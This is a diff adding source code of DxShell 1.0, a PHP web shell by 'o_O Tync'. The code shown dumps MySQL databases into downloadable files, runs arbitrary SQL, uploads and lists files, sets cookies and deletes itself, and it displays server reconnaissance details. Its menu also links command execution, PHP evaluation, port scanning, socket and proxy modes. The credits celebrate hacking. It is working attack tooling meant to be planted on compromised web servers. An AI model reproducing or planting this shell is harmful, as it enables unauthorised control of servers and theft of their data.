	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	/* export as csv */
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$_POST['dxsql_q']=explode(';',$_POST['dxsql_q']);
+
+	for ($q=0;$q<count($_POST['dxsql_q']);$q++)
+		{
		if (empty($_POST['dxsql_q'][$q])) continue;
+		$num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false);
+		$DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";";
+		if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;}
+		foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */
+		for ($l=0;$l<count($DUMP);$l++)
+			{
			$DxDOWNLOAD_File['content'].="\n";
+			$INDEXES=array_keys($DUMP[$l]);
+			for ($i=0; $i<count($INDEXES); $i++)
+				$DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";";
+
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables']))
+	{
	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	if (empty($_POST['dxsql_tables']))  die(DxError('No tables selected...'));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66);
+	$DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync';
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']);
+	$DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */';
+
+	if (!empty($_POST['dxsql_q']))
+		{
		$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+		foreach ($_POST['dxsql_q'] as $CUR)
+			if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */
+		}
+
+	foreach ($_POST['dxsql_tables'] as $CUR_TABLE)
+		{
		$DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' */';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		$DxDOWNLOAD_File['content'].="\n".$DUMP[0][1];
+		$DxDOWNLOAD_File['content'].="\n\n";
+		DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		for ($i=0; $i<count($DUMP); $i++)
+			{
+			for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]);
+			$DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");';
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam']))
+	{
	foreach ($_POST['dxparam'] as $name => $val)
+		{
		if ($name=='DXS_NEWCOOK')
+			{
+			if (empty($val['NAM']) or empty($val['VAL'])) continue;
			DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10);
+			}
+			else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10));
+		}
+	DxGotoURL(DxURL('leave', 'dxmode'));
+	die();
+	}
+
+if (isset($_GET['dxinstant']))
+	{
	$_GET['dxinstant']=strtoupper($_GET['dxinstant']);
+	if ($_GET['dxinstant']=='DEL')
+		{
+		$ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+		print '<script>window.alert("SELF '.(  ($ok)?'deleted. Reload the page to believe me =)':'tried to delete but was unsuccessful'  ).'");</script>';
+		}
+	}
+
+function DxObGZ($s) {return gzencode($s);}
+
+if (isset($DxDOWNLOAD_File))
+	{/* File downloader for everything */
+	if (!$DXGLOBALSHIT)
+		{
+		if ($GLOB['SYS']['GZIP']['CanOutput'])
+			{
+			ini_set('output_buffering',4096);
+			ob_start("DxObGZ");
+			header('Content-Encoding: gzip');
+			}
		for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]);
+		print $DxDOWNLOAD_File['content'];
+		die();
+		}
+	/* if u want to download file when $DXGLOBALSHIT, scroll down */
+	}
+
+###################################################################################
+####################++++++++++++++# M A I N #++++++++++++++++++####################
+###################################################################################
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array'));
+
+########
+########   Main HAT (blackhat? =))) )
+########
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']');
+
+if ($DXGLOBALSHIT)
+	print str_repeat("\n", 20).'<!--SHELL HERE-->';
+?>
+<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title>
+<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251">
+<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS">
+<style>
+img	 {border-width:0pt;}
+body, td 		{font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;}
+h1				{font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;}
+h2				{font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;}
+h3				{font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;}
+caption			{font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;}
+td.h2_oneline	{font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;}
+td.mode_header	{font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;}
+table.outset, td.outset	  {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;}
+table.bord, td.bord, fieldset   {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;}
+hr   {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;}
+textarea.bout 		{border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;}
+td.listing	{background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;}
+td.linelisting  {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
+table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;}
+td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+td.js_floatwin_body	  {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+font.rwx_sticky_bit {color:#FF0000;}
+.highlight_txt		{color: #FFFF00;}
+.achtung			{color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;}
+
+input 			{font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;}
+input.radio		{border-width:0pt;color: #FFFF00;}
+input.submit 	{font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;}
+input.bt_Yes 	{font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_No 	{font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_Yes:Hover 	{color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;}
+input.bt_No:Hover 	{color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;}
+textarea 		{color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt;
+				Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500;
+				Scrollbar-Highlight-Color: #00A000;	Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000;
+				Scrollbar-Darkshadow-Color: #005000;}
+select			{background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;}
+
+A:Link, A:Visited { color: #00D000;	text-decoration: underline; }
+A.no:Link, A.no:Visited { color: #00D000;	text-decoration: none; }
+A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; }
+.Hover:Hover {color: #FFFF00; cursor:help;}
+.HoverClick:Hover {color: #FFFF00; cursor:crosshair;}
+span.margin		{margin: 0pt 10pt;}
+td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;}
+td.warning {color:#000000; background-color: #D00000; font-size: 11pt;}
+font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;}
+</style>
+
+<?php
+if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT')))
+	{  /* THIS FLOATING WINDOW IS ONLY SET FOR MODES: */
?>
+<SCRIPT>
+var dom = document.getElementById?1:0;
+var ie4 = document.all && document.all.item;
+var opera = window.opera; //Opera
+var ie5 = dom && ie4 && !opera;
+var nn4 = document.layers;
+var nn6 = dom && !ie5 && !opera;
+var vers=parseInt(navigator.appVersion);
+var good_browser = (ie5 || ie4);
+function showwin(hdr,txt,w,vis)
+{
+if(good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	var temp =
+	"<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">"
+	+((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"")
+	+"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>"
+	+"</TABLE>";
+
+	if (vis == 1)
+		{
+		obj.innerHTML = temp;
+		obj.style.width = w;
+		hor = document.body.scrollWidth - obj.offsetWidth;
+		posHor = xOffset + evnt.clientX + 10;
+		posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+		posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+		if (posHor<hor)
+			obj.style.posLeft = posHor
+		else
+			obj.style.posLeft = posHor2;
+
+		obj.style.posTop = posVer;
+
+		obj.style.visibility = "visible";
+		}
+		else
+		{
+		obj.style.visibility = "hidden";
+		obj.style.posTop = 0;
+		obj.style.posLeft = 0;
+		}
+	}
+}
+function movewin()
+{
+if (good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	hor = document.body.scrollWidth - obj.offsetWidth;
+	posHor = xOffset + evnt.clientX + 10;
+	posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+	posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+	if (posHor<hor)
+		obj.style.posLeft = posHor
+		else
+		obj.style.posLeft = posHor2;
+
+	obj.style.posTop = posVer;
+	}
+}
+</SCRIPT>
+<?php } /* /END */?>
+
+</head>
+<body>
+<?php
+if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */
+	{
	print str_repeat("\n", 10).'<!--SHIT KILLER-->';
+	print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 5).str_repeat('</script>', 2);
+	print "\n".'<TABLE WIDTH=100% BORDER=0  style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>';
+	print "\n\n\n\n";
+	}
+?>
+
+<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td>
+	<td>
+<?php
+print "\n".'<div style="margin-right:'.(  ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30'  ).'pt;">';
+print "\n".(  ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':''  );
+print "\n".DxPrint_ParamState('php_ver', 		phpversion()						).' ; ';
+print "\n".DxPrint_ParamState('php_Safe_Mode', 	$GLOB['PHP']['SafeMode'], '!'		).' ; ';
+print "\n".DxPrint_ParamState('magic_quotes', 	(bool)get_magic_quotes_gpc(), '!'	).' ; ';
+print "\n".DxPrint_ParamState('gZip', 			function_exists('gzencode')			).' ; ';
+print "\n".DxPrint_ParamState('cURL', 			function_exists('curl_version')		).' ; ';
+print "\n".DxPrint_ParamState('MySQL', 			function_exists('mysql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('MsSQL', 			function_exists('mssql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('PostgreSQL', 	function_exists('pg_connect')		).' ; ';
+print "\n".DxPrint_ParamState('Oracle', 		function_exists('ocilogon')			).' ; ';
+print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>');
+print "\n".'</div>';
+
+print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>';
+if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)
+	print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>';
+print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>';
+print "\n".'</nobr></td></tr></table></span>';
+
+print "\n\n".'<hr>';
+print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; ';
+print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; ';
+print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; ';
+print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' / '.getmyinode().'</b> ; </nobr>';
+print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; ';
+print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE'];
+?>
+	</td>
+</table>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><h2>Modes</td>
+	<td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a>
+	</td>
+	</tr>
+</table>
+
+<?php $DX_Header_drawn=true; ?>
+
+<?php
+#################################################
+########
+########   DXGLOBALSHIT DOWNLOADER
+########
+if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */
+	{
	print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>';
+	print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =((';
+	print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download';
+
+	if ($GLOB['SYS']['GZIP']['CanUse'])  $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6);
+
+	print "\n\n".'<br><br>';
+	print "\n".'<textarea rows=30 style="width:90%" align=center>';
+	print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)';
+	print "\n".'// The file is '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':''  ).' base64_encode()ed';
+	print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';';
+	print "\n\n\n\n";
+	print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');';
+	print "\n".'fputs($f, '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)'  ).');';
+	print "\n".'fclose($f);';
+	print "\n".'//Yahoo, hacker, the file is here =)';
+	print "\n".'?>';
+	print "\n".'</textarea>';
+	die();
+	}
+
+?>
+
+<table align=center>
+	<tr><td class=mode_header>
+	@MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?>
+	</td></tr></table>
+<?
+
+########
+########   AboutBox
+########
+if ($_GET['dxmode']=='WTF')
+	{
+	?>
+<table align=center class=nooooneblya><tr><td><div align=center>
+<?php
+print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>';
+print '<br>o_O Tync, ICQ# 1227-700';
+?><br><br>
+<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table>
+<SCRIPT language=Javascript><!--
+var tl=new Array(
+"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?",
+"What's wrong with other shells?",
+"Usability, functionality, bugs?... NO.",
+"The main bug is: these shells ARE NOT mine =)",
+"Just like to be responsible for every motherfucking byte of code.",
+"Enjoy!",
+"-----------------------------------",
+"o_O Tync, http://hellknights.void.ru/, ICQ# 1227-700",
+"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>",
+"",
+"Greetz to: ",
+"iNfantry the Ruler",
+"Nik8 the Hekker",
+"_1nf3ct0r_ the Father",
+"Industry of Death the betatest0r =)",
+"",
+"Thanks to:",
+"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music",
+"",
+"Wartime testers & debuggers ::: =))) :::",
+"MINDGROW",
+"BELLFAGOR",
+"",
+"",
+"Hekk da pl0net!",
+"--- EOF ---"
+);
+var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row;
+function type_text()
+{
contents='';row=Math.max(0,index-50);
+while(row<index) contents += tl[row++] + '\r\n';
+document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|';
+if(text_pos++==str_length)
+	{text_pos=0;index++;
+	if(index!=tl.length)
+	{str_length=tl[index].length;setTimeout("type_text()",1000);
+	}
+	} else setTimeout("type_text()",speed);
+}type_text();
+//-->
+</SCRIPT>
+	<?php
+	}
+
+
+		###################################
+
+########
+########   Upload file
+########
+if ($_GET['dxmode']=='UPL')
+	{
+	if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted'));
+
+	if (isset($_FILES['dx_uplfile']['tmp_name']))
+		{
+		$GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']);
+		DxFiles_UploadHere($_POST['dxdir'], $_FILES['dx_uplfile']['name'], $GETFILE);
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>';
+		print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">';
+		print "\n".'<font class="highlight_txt">Max: '.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>';
+		print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>';
+		print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>';
+		print "\n".'<input type=submit value="Upload" class="submit"></form>';
+		}
+	}
+
+		###################################
+
+########
+########   Directory listings
+########
+if ($_GET['dxmode']=='DIR')
+	{
+	if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']);
+	$_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']);
+	if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/';
+
+	print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+	DxGETinForm('leave', 'dxmode');
+	print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>';
+	print "\n".'<input type=submit value="Goto" class="submit"></form>';
+
+	print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>';
+	if (!file_exists($_GET['dxdir'])) die(DxError('No such directory'));
+	if (!is_dir($_GET['dxdir'])) 	  die(DxError('It\'s a file!! What do you think about listing files in a file? =)) '));
+
+	if (isset($_GET['dxparam']))
+		{
		if ($_GET['dxparam']=='mkDIR')  if (	!mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkDir. Perms?');
+		if ($_GET['dxparam']=='mkFILE') if (	!touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkFile. Perms?');
+		}
+
+	if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. Perms?...'));
+	$FILES=array('DIRS' => array(), 'FILES' => array());
+	while (!is_bool( $file = readdir($dir_ptr)  ) )
+		if (($file!='.') and ($file!='..'))		if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file;
+	asort($FILES['DIRS']);asort($FILES['FILES']);
+
+	print "\n".'<span style="position:absolute;right:0pt;">';
+	if (isset($_GET['dxdirsimple']))	print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>';
+		else					print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>';
+	print '</span>';
+
+	$folderup_link=explode('/',$_GET['dxdir'].'../');
+	if (!empty($folderup_link[   count($folderup_link)-3   ]) AND ($folderup_link[   count($folderup_link)-3   ]!='..'))
+		unset($folderup_link[   count($folderup_link)-3   ], $folderup_link[   count($folderup_link)-1   ]);
+	$folderup_link=implode('/', $folderup_link);
+	print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>'
+						.DxImg('foldup').' ../</a>';
+
+	print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>'
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>'
+		.' / '.str_repeat('&nbsp;',5)
+		.'<font class=highlight_txt>UPLOAD: </font>'
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>'
+		;
+
+	print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' files ';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">';
+	for ($NOWi=0;$NOWi<=1;$NOWi++)
+		for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++)
+			{
			$cur=&$FILES[$NOW][$i];
+			$dircur=$_GET['dxdir'].$cur;
+			print "\n".'<tr>';
+			print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>'
+							.(($NOW=='DIRS')?DxImg('folder').' '
+							.				 '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'')
+							.(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'')
+							.htmlspecialchars($cur).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				print "\n\t".'<td class=linelisting>'
+					.'<span '.DxDesign_DrawBubbleBox('File Info',    '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>'
+															 		.'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>'
+															 		.'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur))
+															 		, 150).' class=Hover><b>INFO</span> </td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>'
